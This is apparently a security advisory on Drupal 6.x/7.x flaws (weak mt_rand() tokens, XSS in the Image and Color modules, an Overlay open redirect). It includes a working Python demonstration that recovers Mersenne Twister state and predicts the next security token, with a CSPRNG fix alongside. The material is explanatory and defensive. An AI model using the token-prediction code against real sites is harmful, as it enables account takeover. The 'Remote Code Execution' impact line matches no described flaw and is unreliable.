Drupal Multiple Vulnerabilities
Last Update Date:
22 Nov 2013 10:30
Release Date:
22 Nov 2013
RISK: Medium Risk
TYPE: Servers - Web Servers
Multiple vulnerabilities have been identified in Drupal, which can be exploited by malicious users to conduct script insertion attacks and by malicious people to conduct brute force, spoofing, and cross-site scripting attacks.
- The application generates security-related strings using mt_rand() as its entropy source. mt_rand() is a Mersenne Twister pseudo-random number generator, not a cryptographically secure one, so an attacker who observes enough of its output can reconstruct its internal state and predict the values of the generated strings. This weakness is reported in 6.x versions prior to 6.29 and 7.x versions prior to 7.24.
- Certain unspecified input related to the Image module is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in the context of an affected site if the malicious data is viewed. Successful exploitation of this vulnerability requires the "administer taxonomy" permission.
- Certain unspecified input related to the Color module is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. Successful exploitation of this vulnerability requires the victim to use an old browser version, such as older releases of Internet Explorer and Opera.
- Certain input related to the Overlay module is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website, e.g. when the user clicks a specially crafted link to the affected script hosted on the trusted domain (an open redirect). Successful exploitation of this weakness requires that the victim has the "Access the administrative overlay" permission.
The Image module, Color module and Overlay module issues are reported in 7.x versions prior to 7.24.
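The following is an added example illustrating the mt_rand() weakness described above; it is not code from Drupal or from this advisory. It uses Python's random module as a stand-in, because it is the same MT19937 generator that PHP's mt_rand() wraps: a constructed site builds a "security string" directly from generator output, an attacker collects 624 consecutive 32-bit words from strings it can legitimately obtain, inverts the output tempering to recover the generator state, and predicts the next string. The function names (weak_token, clone_mt, predict_next_token) and the token layout are assumptions made for the example. Caveat for a real PHP target: mt_rand() returns the 32-bit word shifted right by one (31-bit values), so the dropped bit must be brute-forced or recovered from additional outputs, and PHP releases before 7.1 carried a deviation from the reference MT19937 twist; the untempering below assumes the reference algorithm.

```python
import random
import secrets

MT_N = 624  # MT19937 state size in 32-bit words


def temper(x):
    """MT19937 output tempering, used here only to self-check the inverse."""
    x ^= x >> 11
    x ^= (x << 7) & 0x9D2C5680
    x ^= (x << 15) & 0xEFC60000
    x ^= x >> 18
    return x & 0xFFFFFFFF


def undo_xor_rshift(y, shift):
    """Invert y = x ^ (x >> shift) for a 32-bit x (top bits are known first)."""
    x = y
    for _ in range(32 // shift):
        x = y ^ (x >> shift)
    return x


def undo_xor_lshift_mask(y, shift, mask):
    """Invert y = x ^ ((x << shift) & mask) for a 32-bit x (low bits are known first)."""
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ ((x << shift) & mask)
    return x & 0xFFFFFFFF


def untemper(y):
    """Recover the raw state word from one tempered MT19937 output."""
    y = undo_xor_rshift(y, 18)
    y = undo_xor_lshift_mask(y, 15, 0xEFC60000)
    y = undo_xor_lshift_mask(y, 7, 0x9D2C5680)
    y = undo_xor_rshift(y, 11)
    return y


def clone_mt(observed):
    """Build a generator in the same state as the one that produced 624 consecutive outputs."""
    if len(observed) != MT_N:
        raise ValueError("need exactly %d consecutive 32-bit outputs" % MT_N)
    state = tuple(untemper(w) for w in observed)
    clone = random.Random()
    # Python's state tuple: (version 3, 624 state words + index, gauss_next).
    # index = 624 forces a twist before the next output, matching the original.
    clone.setstate((3, state + (MT_N,), None))
    return clone


def weak_token(rng, words=4):
    """Vulnerable pattern (constructed): a 'security string' built from raw MT output."""
    return "".join("%08x" % rng.getrandbits(32) for _ in range(words))


def strong_token(nbytes=16):
    """Hardened replacement: draw the string from the OS CSPRNG instead."""
    return secrets.token_hex(nbytes)


def words_from_token(token):
    return [int(token[i:i + 8], 16) for i in range(0, len(token), 8)]


def predict_next_token(observed_tokens, words=4):
    """Attacker side: rebuild the state from the last 624 words seen, then emit the next token."""
    seen = [w for t in observed_tokens for w in words_from_token(t)]
    clone = clone_mt(seen[-MT_N:])
    return weak_token(clone, words)


def demo(seed=2013):
    """Returns True if the attacker's prediction matches the site's next token."""
    site = random.Random(seed)                       # the site's mt_rand()
    leaked = [weak_token(site) for _ in range(MT_N // 4)]  # 156 tokens = 624 words
    predicted = predict_next_token(leaked)
    actual = weak_token(site)                        # e.g. a token issued to the victim
    return predicted == actual


if __name__ == "__main__":
    print("prediction correct:", demo())
    print("CSPRNG token:", strong_token())
```

Any 624 consecutive outputs suffice, whatever their alignment with the generator's internal block boundaries, which is why leaking many small tokens is as damaging as leaking one large one. The mitigation is not a better seed but a different source: strings that gate authentication, password resets or CSRF checks must come from a CSPRNG, as strong_token() does.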
Impact
- Cross-Site Scripting
- Remote Code Execution
- Spoofing
System / Technologies affected
- Drupal 6.x
- Drupal 7.x
Solutions
Before installation of the software, please visit the software manufacturer's website for more details.
- Update to a fixed version: Drupal 6.29 or later for the 6.x branch, Drupal 7.24 or later for the 7.x branch.
Vulnerability Identifier
- No CVE information is available